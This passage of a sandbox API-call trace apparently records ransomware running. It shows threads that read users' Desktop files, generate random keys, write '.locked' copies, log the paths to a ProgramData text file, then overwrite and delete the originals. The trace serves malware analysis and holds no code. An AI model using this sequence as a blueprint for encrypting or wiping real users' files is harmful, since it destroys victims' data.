WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.249] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.314] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.324] SetEvent (hEvent=0x22c) returned 1 [0274.324] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0274.359] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.359] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0274.364] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.364] SetEvent (hEvent=0x12c) returned 1 [0274.364] SetEvent (hEvent=0x220) returned 1 [0274.364] SetEvent (hEvent=0x14c) returned 1 [0274.364] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.444] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33a6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33a6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33a6fb34, ulNumEntriesRemoved=0x33a6fb14) returned 0 [0274.445] SetEvent (hEvent=0x150) returned 1 [0274.445] SetEvent (hEvent=0x12c) returned 1 [0274.445] SetEvent (hEvent=0x220) returned 1 [0274.445] SetEvent (hEvent=0x14c) returned 1 [0274.445] SetEvent (hEvent=0x1ac) returned 1 [0274.445] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.726] SetEvent (hEvent=0x220) returned 1 [0274.726] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\_2Qs2D.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\_2qs2d.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0274.727] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12639d9c | out: lpMode=0x12639d9c) returned 0 [0274.727] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\_2Qs2D.odp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\_2qs2d.odp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0274.727] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12639d9c | out: lpMode=0x12639d9c) returned 0 [0274.727] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e0c0 | out: pbBuffer=0x1263e0c0) returned 1 [0274.728] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766090 | out: pbBuffer=0x12766090) returned 1 [0274.728] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702481 | out: pbBuffer=0x12702481) returned 1 [0274.728] WriteFile (in: hFile=0x208, lpBuffer=0x126df000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12639d78, lpOverlapped=0x0 | out: lpBuffer=0x126df000*, lpNumberOfBytesWritten=0x12639d78*=0x80, lpOverlapped=0x0) returned 1 [0274.731] ReadFile (in: hFile=0x1e0, lpBuffer=0x14966000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12639d68, lpOverlapped=0x0 | out: lpBuffer=0x14966000*, lpNumberOfBytesRead=0x12639d68*=0x135f, lpOverlapped=0x0) returned 1 [0274.733] WriteFile (in: hFile=0x208, lpBuffer=0x14966000*, nNumberOfBytesToWrite=0x135f, lpNumberOfBytesWritten=0x12639d74, lpOverlapped=0x0 | out: lpBuffer=0x14966000*, lpNumberOfBytesWritten=0x12639d74*=0x135f, lpOverlapped=0x0) returned 1 [0275.997] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0276.402] ReadFile (in: hFile=0x1e0, lpBuffer=0x14966000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12639d68, lpOverlapped=0x0 | out: lpBuffer=0x14966000*, lpNumberOfBytesRead=0x12639d68*=0x0, lpOverlapped=0x0) returned 1 [0276.431] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0277.261] SetEvent (hEvent=0x1dc) returned 1 [0277.261] CloseHandle (hObject=0x208) returned 1 [0277.262] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0278.135] CloseHandle (hObject=0x1e0) returned 1 [0278.135] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0278.135] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12639e94 | out: lpMode=0x12639e94) returned 0 [0278.135] WriteFile (in: hFile=0x1e0, lpBuffer=0x12352280*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x12639e64, lpOverlapped=0x0 | out: lpBuffer=0x12352280*, lpNumberOfBytesWritten=0x12639e64*=0x46, lpOverlapped=0x0) returned 1 [0278.136] CloseHandle (hObject=0x1e0) returned 1 [0278.137] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\_2Qs2D.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\_2qs2d.odp")) returned 1 [0278.155] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0278.773] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x0 [0278.775] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33a6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33a6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33a6fb30, ulNumEntriesRemoved=0x33a6fb10) returned 0 [0278.775] SetEvent (hEvent=0x150) returned 1 [0278.775] SetEvent (hEvent=0x220) returned 1 [0278.775] SetEvent (hEvent=0x21c) returned 1 [0278.775] SetEvent (hEvent=0x20c) returned 1 [0278.776] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0278.780] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0278.780] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0278.932] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0278.932] SetEvent (hEvent=0x1ac) returned 1 [0278.932] SetEvent (hEvent=0x184) returned 1 [0278.932] SetEvent (hEvent=0x20c) returned 1 [0278.932] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0278.975] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33a6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33a6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33a6fb34, ulNumEntriesRemoved=0x33a6fb14) returned 0 [0278.976] SetEvent (hEvent=0x150) returned 1 [0278.976] SetEvent (hEvent=0x184) returned 1 [0278.976] SetEvent (hEvent=0x20c) returned 1 [0278.976] SetEvent (hEvent=0x1ac) returned 1 [0278.976] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\_2Qs2D.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\_2qs2d.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0279.051] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0279.636] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0279.636] WriteFile (in: hFile=0x19c, lpBuffer=0x13d1a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12659e78, lpOverlapped=0x0 | out: lpBuffer=0x13d1a000*, lpNumberOfBytesWritten=0x12659e78*=0xfa000, lpOverlapped=0x0) returned 1 [0279.698] CloseHandle (hObject=0x19c) returned 1 [0279.921] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0280.211] SetEvent (hEvent=0x14c) returned 1 [0280.211] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0280.310] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0285.908] SetEvent (hEvent=0x184) returned 1 [0285.908] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0285.971] SetEvent (hEvent=0x1ac) returned 1 [0285.971] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0286.077] SetEvent (hEvent=0x20c) returned 1 [0286.077] SetEvent (hEvent=0x22c) returned 1 [0286.077] SetEvent (hEvent=0x214) returned 1 [0286.077] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0299.724] SetEvent (hEvent=0x1e8) returned 1 [0299.724] SetEvent (hEvent=0x104) returned 1 [0299.724] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0307.693] SetEvent (hEvent=0x190) returned 1 [0307.693] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0307.706] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0307.710] SetEvent (hEvent=0x12c) returned 1 [0307.710] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0307.844] SetEvent (hEvent=0x1ac) returned 1 [0307.844] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0307.859] SetEvent (hEvent=0x1e8) returned 1 [0307.859] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0308.777] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0309.372] SetEvent (hEvent=0x22c) returned 1 [0309.372] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0309.385] SetEvent (hEvent=0x22c) returned 1 [0309.385] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0309.386] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.512] SetEvent (hEvent=0x22c) returned 1 [0310.512] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.559] SetEvent (hEvent=0x21c) returned 1 [0310.559] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.562] SetEvent (hEvent=0x1f0) returned 1 [0310.563] SetEvent (hEvent=0x14c) returned 1 [0310.563] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.625] SetEvent (hEvent=0x1dc) returned 1 [0310.626] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0310.629] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.629] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0310.631] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.631] SetEvent (hEvent=0x1dc) returned 1 [0310.631] SetEvent (hEvent=0x104) returned 1 [0310.631] SetEvent (hEvent=0x184) returned 1 [0310.631] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0310.632] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33a6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33a6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33a6fb34, ulNumEntriesRemoved=0x33a6fb14) returned 0 [0310.632] SetEvent (hEvent=0x184) returned 1 [0310.632] SetEvent (hEvent=0x104) returned 1 [0310.633] SetEvent (hEvent=0x20c) returned 1 [0310.633] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0311.570] SetEvent (hEvent=0x1e8) returned 1 [0311.571] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0311.642] SetEvent (hEvent=0x184) returned 1 [0311.642] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0311.674] SetEvent (hEvent=0x1b8) returned 1 [0311.674] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0311.677] SetEvent (hEvent=0x214) returned 1 [0311.677] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0311.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1237a6c0, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0311.690] CloseHandle (hObject=0x230) returned 1 [0311.690] SetEvent (hEvent=0x190) returned 1 [0311.690] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0320.206] SetEvent (hEvent=0x198) returned 1 [0320.206] SetEvent (hEvent=0x1f0) returned 1 [0320.206] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0320.211] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) Thread: id = 442 os_tid = 0xd08 [0260.708] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33baff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33baff58*=0x1d8) returned 1 [0260.708] SetEvent (hEvent=0x1b8) returned 1 [0260.708] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1dc [0260.708] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0260.715] SetEvent (hEvent=0x1d0) returned 1 [0260.715] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0260.719] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0260.852] SetEvent (hEvent=0x1f0) returned 1 [0260.852] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390240 | out: pbBuffer=0x12390240) returned 1 [0260.852] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392060 | out: pbBuffer=0x12392060) returned 1 [0260.852] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714201 | out: pbBuffer=0x12714201) returned 1 [0260.853] SetEvent (hEvent=0x12c) returned 1 [0260.853] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0260.857] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0260.859] SetEvent (hEvent=0x134) returned 1 [0260.860] WriteFile (in: hFile=0x1d4, lpBuffer=0x126eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125f5d78, lpOverlapped=0x0 | out: lpBuffer=0x126eb000*, lpNumberOfBytesWritten=0x125f5d78*=0x80, lpOverlapped=0x0) returned 1 [0260.861] VirtualAlloc (lpAddress=0x145b0000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x145b0000 [0260.899] VirtualAlloc (lpAddress=0x10e48000, dwSize=0x9c000, flAllocationType=0x1000, flProtect=0x4) returned 0x10e48000 [0260.902] VirtualAlloc (lpAddress=0x2169000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2169000 [0261.035] SetEvent (hEvent=0x12c) returned 1 [0261.035] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.041] SetEvent (hEvent=0x184) returned 1 [0261.041] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.045] SetEvent (hEvent=0x12c) returned 1 [0261.045] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.048] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.065] SetEvent (hEvent=0x14c) returned 1 [0261.065] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.355] SetEvent (hEvent=0x104) returned 1 [0261.355] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.473] SetEvent (hEvent=0x134) returned 1 [0261.473] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.569] SetEvent (hEvent=0x12c) returned 1 [0261.569] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.819] SetEvent (hEvent=0x184) returned 1 [0261.819] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.847] SetEvent (hEvent=0x21c) returned 1 [0261.847] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.897] SetEvent (hEvent=0x220) returned 1 [0261.897] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.919] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0261.988] SetEvent (hEvent=0x1d0) returned 1 [0261.988] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0265.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1237a480, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x204 [0265.526] CloseHandle (hObject=0x204) returned 1 [0265.526] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0265.596] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0265.642] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0265.642] SetEvent (hEvent=0x21c) returned 1 [0265.642] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0269.701] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0269.701] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0269.701] WriteFile (in: hFile=0x1a4, lpBuffer=0x12670200*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x12670200*, lpNumberOfBytesWritten=0x12657e64*=0x37, lpOverlapped=0x0) returned 1 [0269.702] CloseHandle (hObject=0x1a4) returned 1 [0269.703] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\IcNKdj QY jIfR5.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\icnkdj qy jifr5.bmp")) returned 1 [0270.183] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x0 [0270.186] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0270.186] SetEvent (hEvent=0x150) returned 1 [0270.186] SetEvent (hEvent=0x1d0) returned 1 [0270.186] SetEvent (hEvent=0x134) returned 1 [0270.190] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0270.198] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0270.198] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0270.203] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0270.203] SetEvent (hEvent=0x1ac) returned 1 [0270.203] SetEvent (hEvent=0x1d0) returned 1 [0270.203] SetEvent (hEvent=0x220) returned 1 [0270.203] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0270.205] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0270.206] SetEvent (hEvent=0x150) returned 1 [0270.206] SetEvent (hEvent=0x220) returned 1 [0270.206] SetEvent (hEvent=0x1d0) returned 1 [0270.217] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\IcNKdj QY jIfR5.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\icnkdj qy jifr5.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0270.361] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0270.676] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12657e88 | out: lpMode=0x12657e88) returned 0 [0270.676] WriteFile (in: hFile=0x1c8, lpBuffer=0x14d40000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12657e78, lpOverlapped=0x0 | out: lpBuffer=0x14d40000*, lpNumberOfBytesWritten=0x12657e78*=0xfa000, lpOverlapped=0x0) returned 1 [0270.924] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0273.347] CloseHandle (hObject=0x1c8) returned 1 [0273.430] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\IcNKdj QY jIfR5.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\icnkdj qy jifr5.bmp")) returned 1 [0273.630] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0273.694] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0273.696] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0273.714] SetEvent (hEvent=0x190) returned 1 [0273.714] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0273.728] SetEvent (hEvent=0x104) returned 1 [0273.728] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0274.147] SetEvent (hEvent=0x1b8) returned 1 [0274.147] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0274.180] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0274.180] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0274.218] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0274.218] SetEvent (hEvent=0x1d0) returned 1 [0274.218] SetEvent (hEvent=0x220) returned 1 [0274.218] SetEvent (hEvent=0x1b8) returned 1 [0274.219] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0274.253] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0274.253] SetEvent (hEvent=0x150) returned 1 [0274.254] SetEvent (hEvent=0x1d0) returned 1 [0274.254] SetEvent (hEvent=0x220) returned 1 [0274.254] SetEvent (hEvent=0x1b8) returned 1 [0274.254] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\wpUR.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wpur.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0274.254] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12631d9c | out: lpMode=0x12631d9c) returned 0 [0274.254] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\wpUR.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wpur.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0274.255] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12631d9c | out: lpMode=0x12631d9c) returned 0 [0274.255] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0274.255] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e050 | out: pbBuffer=0x1234e050) returned 1 [0274.255] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0274.255] WriteFile (in: hFile=0x228, lpBuffer=0x12681000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12631d78, lpOverlapped=0x0 | out: lpBuffer=0x12681000*, lpNumberOfBytesWritten=0x12631d78*=0x80, lpOverlapped=0x0) returned 1 [0274.282] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0274.315] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0274.315] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0274.315] SetEvent (hEvent=0x1d0) returned 1 [0274.315] SetEvent (hEvent=0x220) returned 1 [0274.315] SetEvent (hEvent=0x1b8) returned 1 [0274.315] ReadFile (in: hFile=0x1f4, lpBuffer=0x135de000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12631d68, lpOverlapped=0x0 | out: lpBuffer=0x135de000*, lpNumberOfBytesRead=0x12631d68*=0x1342b, lpOverlapped=0x0) returned 1 [0274.318] WriteFile (in: hFile=0x228, lpBuffer=0x135de000*, nNumberOfBytesToWrite=0x1342b, lpNumberOfBytesWritten=0x12631d74, lpOverlapped=0x0 | out: lpBuffer=0x135de000*, lpNumberOfBytesWritten=0x12631d74*=0x1342b, lpOverlapped=0x0) returned 1 [0274.328] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0276.092] ReadFile (in: hFile=0x1f4, lpBuffer=0x135de000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12631d68, lpOverlapped=0x0 | out: lpBuffer=0x135de000*, lpNumberOfBytesRead=0x12631d68*=0x0, lpOverlapped=0x0) returned 1 [0276.115] CloseHandle (hObject=0x228) returned 1 [0276.129] CloseHandle (hObject=0x1f4) returned 1 [0276.129] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0276.130] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12631e94 | out: lpMode=0x12631e94) returned 0 [0276.130] WriteFile (in: hFile=0x1f4, lpBuffer=0x12348210*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x12631e64, lpOverlapped=0x0 | out: lpBuffer=0x12348210*, lpNumberOfBytesWritten=0x12631e64*=0x2c, lpOverlapped=0x0) returned 1 [0276.130] CloseHandle (hObject=0x1f4) returned 1 [0276.131] DeleteFileW 